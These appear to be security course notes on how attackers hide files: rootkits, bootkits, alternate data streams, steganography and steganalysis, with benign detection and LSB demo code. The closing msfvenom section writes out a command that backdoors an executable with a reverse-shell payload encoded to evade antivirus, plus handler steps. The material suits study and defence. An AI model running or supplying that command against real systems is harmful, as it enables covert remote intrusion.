Version: 1.0.2

Hiding files

  • Attackers attempt to cover their tracks in order to ensure future access to the system.

Rootkits

  • 📝 Creates a backdoor to the system that lets the attacker access it again later.
  • Hides itself to avoid detection, e.g. it can
    • remove itself from the process list
    • replace certain system calls and utilities
  • Does not spread by itself.
    • Usually hidden in other software, waiting to be executed
  • 💡 Best option for recovery is to wipe and reload from known-good media.
  • See also Rootkit Trojans
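A rootkit that removes itself from the process list is typically caught by a cross-view check: two independent ways of enumerating processes are compared and any disagreement is investigated. The following is an added example (not from the original notes) of that check on Linux; it compares the PIDs visible by listing /proc (what ps and top use) with the PIDs that answer a kill(pid, 0) probe, and the max_pid default is an assumption that should be replaced with the system's /proc/sys/kernel/pid_max.

```python
# Added example (not from the original notes): cross-view detection of
# processes hidden from the process list, the technique tools like unhide
# automate. PIDs visible by listing /proc (what ps and top use) are compared
# with PIDs that answer a kill(pid, 0) probe. Linux only; no /proc, no findings.
import os
from typing import Set

def proc_view() -> Set[int]:
    """PIDs returned by listing /proc, which is what ps and top rely on."""
    if not os.path.isdir("/proc"):
        return set()
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}

def is_alive(pid: int) -> bool:
    """kill(pid, 0) sends no signal but reports whether the PID exists."""
    try:
        os.kill(pid, 0)
        return True
    except ProcessLookupError:
        return False
    except PermissionError:
        return True          # exists but belongs to another user

def is_thread(pid: int) -> bool:
    """Thread IDs answer kill() but are not top-level /proc entries: not hidden."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) != pid
    except OSError:
        pass
    return False

def hidden_pids(max_pid: int = 32768) -> Set[int]:
    """PIDs alive per kill() but absent from the /proc listing and not threads.
    max_pid is an assumed default; pass the value of /proc/sys/kernel/pid_max."""
    if not os.path.isdir("/proc"):
        return set()
    listed = proc_view()
    candidates = [p for p in range(1, max_pid + 1) if p not in listed and is_alive(p)]
    confirmed = set()
    for pid in candidates:
        # Re-check both views so a process that exited, or was created, between
        # the two enumerations is not reported; a hidden one stays alive and unlisted.
        if is_alive(pid) and pid not in proc_view() and not is_thread(pid):
            confirmed.add(pid)
    return confirmed
```

An empty set from hidden_pids() means the two views agree; any PID it returns deserves a look with a second tool, since a rootkit that hooks the syscalls both views rely on will fool this check too.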

Rootkit objectives

  • Gaining remote backdoor access
  • Hiding traces of the attack
  • Collecting confidential data
  • Installing other malicious programs on the machine

Rootkit levels

  • Hypervisor level
    • Acts as a hypervisor and loads the target OS as a virtual machine.
  • Hardware/firmware level
    • Conceals itself in hardware devices that are not inspected
    • E.g. in motherboard firmware used to spy on governments
  • Kernel level
    • Replaces portions of OS code or adds new malicious code to it.
    • Hard to detect as it runs with OS privileges (ring 0)
    • E.g. the Linux Mint website was hacked to distribute ISO files with a malicious kernel.
  • Boot loader level
    • Replaces the original bootloader with a malicious one
  • Application level
    • Changes the behavior of the target application
  • Library level
    • Designed to replace the original system calls in order to hide the attacker's activities
  • Figure: privilege rings for x86 available in protected mode
  • Horse Pill (slides, code)
    • Linux rootkit that:
      1. Infects systems via the initial RAM disk
      2. Deceives system owners using container primitives.
  • GrayFish
    • Rootkit suspected to have been used by the NSA in attacks against e.g. Iran.
    • Developed by the Equation Group, which is considered to be part of the NSA.
    • Implants hard drive firmware and gains access by substituting the MBR
  • ZeroAccess / Sirefef
    • Kernel-mode rootkit that
      • Hides the infected driver on the disk
      • Enables read and write access to the encrypted files
    • Downloads other malware onto an infected machine from a P2P botnet.
  • Necurs
    • Infector and rootkit with the world's largest P2P botnet
    • Distributes many malware families, including Locky ransomware.
    • Taken down by Microsoft and its partners in 2019

Bootkit

  • Kernel-mode rootkit that runs every time the computer boots
  • Can bypass kernel-level code signing in Windows by attaching itself to the master boot record (MBR) of a hard drive
    • The rootkit is then able to modify boot sequences and other options
    • Allows the rootkit to be loaded before the Windows kernel is loaded
  • See also boot sector infectors

NTFS file system

NTFS Data Stream

  • NTFS uses two data streams to store a file:
    1. One stores data about the file (e.g. permissions)
    2. One stores the file data itself

Alternate data stream (ADS)

  • Stream that is not in the file itself but attached to the file through the Master File Table
    • the Master File Table contains a list of all file data streams and their locations on the disk
  • Contains file metadata such as file attributes, author, access and word count
  • Enables attackers to inject malicious code into files and execute it
  • Hard to detect because the file size and the contents remain the same.
    • Only way is to check the timestamps to detect tampering.

Hiding files from GUI

  • Linux and macOS
    • Prepend a single dot (.) to the names of files/folders.
  • Windows
    • Uses a file attribute named hidden for that
    • E.g. by using the ATTRIB +H command
  • Very easy to identify and display from the command line or by changing GUI settings

Steganography

  • 📝 Technique which hides a message within another message.
    • E.g. an image that still looks unchanged but has your data embedded in it.
  • Used for maintaining information confidentiality
    • E.g. historically, holding a letter near a candle to reveal the secret message.
  • Implementations without a shared secret are a form of security through obscurity
  • Often reversible: the hidden message is extracted when it arrives at its destination.
    • Or can be used to watermark images, videos etc. for copyright purposes.
  • Used by attackers e.g. to hide keyloggers or to embed the source code of hacking tools.
  • Can be:
    • Technical steganography: uses scientific methods to hide messages
    • Linguistic steganography: uses a carrier to hide messages
  • Carrier can be: image, document, folder, video, audio, web, spam/email, DVD-ROM, natural text, hidden OS, source code

Steganalysis

  • Discovering hidden data in a medium
  • Two phases
    1. Detection: establishing that hidden information exists
    2. Distortion: trying to extract the hidden message
  • Methods:
    • Stego only attack
      • Only the stego-object is available for analysis.
    • Known stego attack
      • The steganography algorithm is known and both the original and the stego-object are available.
    • Known message attack
      • The hidden message and the corresponding stego-image are known.
      • Analysing the patterns that correspond to the hidden information can help decipher such messages in the future.
    • Known cover attack
      • The stego-object as well as the original medium is available.
      • The stego-object is compared with the original cover object to detect any hidden information.
    • Chosen message attack
      • The steganalyst generates a stego-object from a chosen message using some steganography tool or algorithm.
      • The goal in this attack is to determine patterns in the stego-object that may point to the use of specific steganography tools or algorithms.
    • Chosen stego attack
      • The steganography algorithm and the stego-object are known.
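The two sections above (embedding a message in an image, then analysing the result) are worked through below in an added example that is not part of the original notes: least-significant-bit steganography on a constructed grayscale "image" (a list of 8-bit pixel values, standing in for the pixels a library such as Pillow would decode), with embed and extract routines and the known cover attack, which locates the hidden bits by diffing the stego-object against the original cover. The pixel values and secret are constructed sample data.

```python
# Added example (not from the original notes): LSB steganography on a constructed
# grayscale image, plus the "known cover attack" from the steganalysis list.
# Pixels are plain ints 0-255; decoding a real image into such a list is omitted
# so the example runs offline with no dependencies.
from typing import List

def to_bits(data: bytes) -> List[int]:
    """Big-endian bit list of a byte string."""
    return [(b >> i) & 1 for b in data for i in range(7, -1, -1)]

def embed(cover: List[int], message: bytes) -> List[int]:
    """Hide a length-prefixed message in the least significant bits of the cover pixels."""
    bits = to_bits(len(message).to_bytes(4, "big") + message)
    if len(bits) > len(cover):
        raise ValueError("cover too small for message")
    stego = list(cover)                       # the cover object itself stays untouched
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit    # overwrite only the LSB: change of at most 1
    return stego

def extract(stego: List[int]) -> bytes:
    """Read the LSBs back: 4-byte length prefix first, then that many message bytes."""
    def read(start: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[start + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read(0, 4), "big")
    return read(32, length)

def known_cover_attack(cover: List[int], stego: List[int]) -> List[int]:
    """Known cover attack: pixel indices where the stego-object differs from the original."""
    return [i for i, (c, s) in enumerate(zip(cover, stego)) if c != s]

# Constructed 256-pixel grayscale cover (deterministic, so results are reproducible).
COVER = [(i * 37) % 256 for i in range(256)]
SECRET = b"meet at dawn"
STEGO = embed(COVER, SECRET)

if __name__ == "__main__":
    print("extracted:", extract(STEGO))
    changed = known_cover_attack(COVER, STEGO)
    print(f"{len(changed)} of {len(COVER)} pixels differ, each by at most 1")
```

The known cover attack succeeds only because the analyst has the unmodified original; with the stego-object alone (stego only attack) the per-pixel change of at most 1 is invisible to the eye and must be found statistically.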

steghide

  • Tool to embed and extract data in JPEG, BMP, WAV and AU files.
  • steghide embed -cf test.jpg -ef hide-me.txt
    • -cf: cover file in which the data will be hidden
    • -ef: file to be embedded
    • Asks for a passphrase to encrypt the data
  • steghide extract -sf test.jpg

Packing Malware

  • Embedding malware in other files (e.g. PDF, JPEG) to hide it
  • Executable files are good hosts to embed in, as they'll run your malware when they're executed.
  • You can do it
    • manually (hard to do, hard to detect)
    • or in a standardized way (automated, but detected easily)
  • E.g. many crack files come with embedded malware.

msfvenom

  • 📝 Payload generator and packer in the Metasploit framework.
  • Usage e.g. msfvenom -a x86 --platform windows -x /root/Downloads/someProgram.exe -k -p windows/meterpreter/reverse_tcp LHOST=192.168.122.110 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe -o program.exe
    • -x: Executable that'll be patched (injected into)
    • -k: Keep the program's original functionality
    • -p: Payload to inject
      • In the example it's a reverse shell that gives remote access.
      • Server becomes client (creates the connection), client becomes server.
      • Victim communicates back to the attacking machine
    • -e x86/shikata_ga_nai: Encoder used to evade antivirus detection
    • -i 3: Encode 3 times for more stealth
    • Once it's executed you can start listening for the infected computer using:
      • msfconsole to start listening on the IP address:
        • use exploit/multi/handler
        • set payload windows/shell/reverse_tcp
        • set LHOST <target-ip-address>
        • set LPORT 4444
        • exploit
  • See also MSFvenom | Automated penetration testing tools